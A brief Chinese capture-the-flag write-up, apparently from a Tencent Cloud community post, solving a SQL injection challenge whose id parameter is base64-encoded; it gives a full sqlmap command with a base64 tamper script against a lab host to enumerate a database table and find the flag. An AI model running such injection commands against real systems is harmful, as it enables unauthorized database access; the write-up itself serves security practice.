注入题。id参数可疑,是base64加密。
可以手注,但是半天没找到点。直接上SQLMap跑。
sqlmap -u "http://116.63.149.36:54375/show.php?id=MQo=" --tamper=base64encode -D test -T data --columns --level=3
看到flag,原来是墨者学院的题目。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。